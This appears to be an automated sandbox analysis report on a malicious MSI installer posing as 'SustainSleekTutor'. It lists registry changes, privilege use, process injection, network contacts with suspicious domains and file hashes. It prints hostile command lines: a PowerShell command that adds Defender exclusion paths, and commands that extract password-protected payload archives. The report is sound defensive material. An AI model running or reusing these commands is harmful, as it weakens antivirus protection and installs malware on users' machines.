Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\PackageName = "92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\ProductName = "SustainSleekTutor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\PackageCode = "422D740D8F2748241AF491420E7509A6" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Version = "100794368" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1104 wrote to memory of 3972 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 1104 wrote to memory of 3972 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 1104 wrote to memory of 4328 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 1104 wrote to memory of 4328 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4328 wrote to memory of 2172 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4328 wrote to memory of 2172 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4328 wrote to memory of 1560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 4328 wrote to memory of 1560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 3160 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1560 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1560 wrote to memory of 972 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 2556 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 4328 wrote to memory of 1440 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 1440 wrote to memory of 2052 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3896 wrote to memory of 3868 N/A C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 3868 wrote to memory of 3492 N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 2052 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 2052 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 2BD1613784EED8CBD3268DBA80EEF8FC E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\SustainSleekTutor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 127 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\tsetup.exe

"C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp" /SL5="$90066,44246395,814592,C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs"

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" install

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe" start

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

"C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe"

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 291 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 62 -file file3 -mode mode3

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 246.197.219.23.in-addr.arpa udp
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 dsfgdg5641rfe.icu udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
HK 38.47.221.100:80 dsfgdg5641rfe.icu tcp
US 8.8.8.8:53 100.221.47.38.in-addr.arpa udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 39.9.124.27.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
HK 27.124.9.39:13000 tcp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 51.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 100.76.161.95.in-addr.arpa udp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
NL 149.154.167.91:443 tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 149.154.167.91:80 149.154.167.91 tcp
US 8.8.8.8:53 91.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 mozilla.cloudflare-dns.com udp
SG 149.154.171.5:443 tcp
SG 149.154.171.5:80 149.154.171.5 tcp
US 172.64.41.4:443 mozilla.cloudflare-dns.com tcp
NL 95.161.76.101:443 tcp
US 8.8.8.8:53 4.41.64.172.in-addr.arpa udp
US 8.8.8.8:53 5.171.154.149.in-addr.arpa udp
US 8.8.8.8:53 101.76.161.95.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 fdg156fdg.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp
US 8.8.8.8:53 qdfbvccc.cyou udp

Files

memory/2172-18-0x000002A7D4620000-0x000002A7D4642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_afikessb.5p4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\Volume{0576a638-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{b3375395-ff67-42fa-8ddf-eeb043c5d8de}_OnDiskSnapshotProp

MD5 a78282738825f10d999ee4fc570ef470
SHA1 f5fe745cd21569af7c4c0e4152b1fe43f5d1cbc6
SHA256 182eaf80a73bd48865f404ec41b3a0ce76eed0c5b80adcfdcdaccbe5d37e31de
SHA512 1cdc7afd52e5c952f14c32df9ef9c87d1392dfcfcc8d117208e99f37262030fd0b63a8f703690158b77dc8606c1a51d35d5333659224e215ceb270a1d786af6b

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 0fbe39f8a2b6bd7ed669d351140493df
